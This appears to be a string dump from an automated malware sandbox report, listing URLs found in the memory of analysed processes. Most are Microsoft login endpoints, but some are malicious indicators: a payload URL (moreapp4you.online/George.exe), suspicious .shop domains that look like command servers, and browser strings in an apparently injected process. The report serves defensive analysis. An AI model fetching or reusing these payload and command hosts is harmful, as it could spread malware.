Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3793881542.000001496ECDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1835684843.000001496ECDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 00000011.00000003.1835684843.000001496ECDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srfT
Source: svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688894963.000001496F510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689211384.000001496F56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 00000011.00000003.1689258123.000001496F527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
Source: svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689211384.000001496F56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689258123.000001496F527000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf$
Source: svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689211384.000001496F56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000011.00000003.1689258123.000001496F527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 00000011.00000003.1689211384.000001496F56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfociate.sr
Source: svchost.exe, 00000011.00000002.3791192728.000001496EC2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/Inlin
Source: svchost.exe, 00000011.00000003.1689211384.000001496F56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688787695.000001496F52C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfpriseDe
Source: svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689480355.000001496F556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600xists.srf
Source: svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601d=80600
Source: svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603uthUp
Source: svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=8060480601
Source: svchost.exe, 00000011.00000002.3791192728.000001496EC2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689211384.000001496F56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 00000011.00000003.1688787695.000001496F52C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfttps://log
Source: svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689480355.000001496F556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601in.live.com
Source: svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806031
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603n.live.com/
Source: svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604--
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604live.com/si
Source: svchost.exe, 00000011.00000002.3791192728.000001496EC2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605eConnect
Source: svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606s://account
Source: svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607nkId=253457
Source: svchost.exe, 00000011.00000003.1689117370.000001496F557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608eyData.srf
Source: svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000011.00000003.1688919339.000001496F55A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688787695.000001496F52C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cpI
Source: svchost.exe, 00000011.00000002.3791192728.000001496EC2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605OBESignUp
Source: svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 00000011.00000002.3798555726.000001496FAE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf3
Source: svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688894963.000001496F510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 00000011.00000003.1688844574.000001496EC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 00000011.00000002.3795315046.000001496FA6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3795489773.000001496FA81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 00000011.00000002.3795315046.000001496FA6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf0
Source: svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 00000011.00000003.1688894963.000001496F510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
Source: svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688894963.000001496F510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000011.00000003.1689258123.000001496F527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
Source: svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688894963.000001496F510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 00000011.00000003.1688894963.000001496F510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.000000000333C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moreapp4you.online
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C95000.00000004.00000800.00020000.00000000.sdmp, 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, 1Vkf7silOj.exe, 00000001.00000002.1586636370.000000000333C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moreapp4you.online/George.exe
Source: axplong.exe, 0000000A.00000003.1730905643.0000000001197000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/
Source: axplong.exe, 0000000A.00000003.1730966164.0000000006036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/815364555/3f12ea9a-79fa
Source: 6.exe, 00000008.00000002.1556968219.0000000001812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://publicitycharetew.shop/https://computerexcudesp.shop/
Source: svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688787695.000001496F52C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx
Source: aspnet_regiis.exe, 00000036.00000003.2103386147.000000002347E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2124198557.0000000000448000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000036.00000003.2103386147.000000002347E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: aspnet_regiis.exe, 00000036.00000002.2142722347.00000000232DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: aspnet_regiis.exe, 00000036.00000003.2023992732.0000000023238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000036.00000003.2023992732.0000000023238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000036.00000002.2142722347.00000000232DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2124198557.0000000000448000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: aspnet_regiis.exe, 00000036.00000003.2103386147.000000002347E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
